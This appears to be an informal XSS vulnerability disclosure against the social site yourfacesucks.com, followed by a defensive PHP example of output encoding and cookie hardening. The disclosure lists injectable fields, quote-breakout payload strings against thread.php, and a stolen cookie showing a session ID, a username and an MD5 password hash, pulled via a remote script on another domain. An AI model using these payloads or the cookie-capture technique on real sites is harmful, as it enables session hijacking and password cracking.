Yourfacesucks.com

Homepage:
http://www.yourfacesucks.com

Affected files:

music/video input boxes in editing profile
subject box of sending a PM
thread.php

---------------------------------------

XSS Vuln with cookie disclosure in profile input boxes:

No filter evasion needed here. For PoC try putting in Music/Video input box.

And the cookie data we see is:
This is remote text via xss.js located at youfucktard.com PHPSESSID=bdee69f9a82b5333bc365f01447b8afc; db_user=luny666; loggedin=1; status=0; sessuid=18304; md5pass=91da4589b012c2fe1ceac1fb2363dbc6; onlineid=274562


Breaking down our cookie:
PHPSESSID = (Our php session ID)

db_user= (Our username)

loggedin= (Logged in: yes)

status=0 (Probably means our profile has not been approved yet)

sessuid = (Session userid)

md5pass= (md5 hash of our password)

onlineid= (Our userid #)

So, now we know our username (luny666) and our password hash, which can easily be cracked.

Screenshots:
http://www.youfucktard.com/xsp/facesucks1.jpg
http://www.youfucktard.com/xsp/facesucks2.jpg

----------------------------------------------

Sending PMs XSS Vuln:

No filter evasion needed, in the subject box put:


Screenshot:
http://www.youfucktard.com/xsp/facesucks3.jpg

----------------------------------------------

Viewing threads on thread.php:

Escaping quotes with a few empty tags; try putting this for a PoC:

Viewing the forum (the whole page fills with this vuln, got about 25 popups with this):

">">">">">'><"<"<"<"<<"">">http://www.yourfacesucks.com/forums/thread.php?forumid=15">">">">">">'><"<"<"<"<<"">


Viewing a specific thread in the forum:

">">">">">'><"<"<"<"<<"">">http://www.yourfacesucks.com/forums/thread.php?forumid=15&threadid=51713">">">">">">'><"<"<"<"<<"">
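As an added example (not code from yourfacesucks.com), the two server-side changes that close what this advisory reports: encoding user-supplied text on output so the quote break-out used against thread.php stays inert inside an attribute, and keeping everything except an opaque session id out of the cookie, with HttpOnly set so script in the page cannot read it. The function names, the thread-link markup and the cookie settings are assumptions; only the break-out string comes from the advisory.

```php
<?php
// Added example, not the site's own code. Demonstrates output encoding for
// the attribute/text contexts abused here, and a cookie that carries no
// username, login flag or password hash (compare the md5pass= value above).

declare(strict_types=1);

// Encode for HTML text and for double- or single-quoted attribute values.
// ENT_QUOTES covers both " and ', so a value such as "> cannot close the
// surrounding attribute and start a new tag.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Renders one thread link as thread.php might. $subject is user supplied
// (PM subject, profile music/video field) and therefore untrusted.
// Vulnerable form, for contrast: '<a href="' . $url . '">' . $subject . '</a>'
function render_thread_link(int $forumId, int $threadId, string $subject): string
{
    $url = 'thread.php?forumid=' . $forumId . '&threadid=' . $threadId;
    return '<a href="' . h($url) . '">' . h($subject) . '</a>';
}

// Session cookie hardening (assumed settings): HttpOnly keeps document.cookie
// from exposing the session id to injected script, Secure keeps it off plain
// HTTP, and only the opaque id is stored client-side. Username, approval
// status and the password hash belong in $_SESSION on the server, never in
// the cookie. This limits the damage of an XSS; it does not replace encoding.
function start_hardened_session(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Constructed input: the quote break-out string from the advisory.
$payload = '">">">">">\'><"<"<"<"<<"">';
echo render_thread_link(15, 51713, $payload), PHP_EOL;
```

Every quote and angle bracket in $payload is emitted as an entity, so the browser renders it as literal text inside the link instead of parsing it as markup.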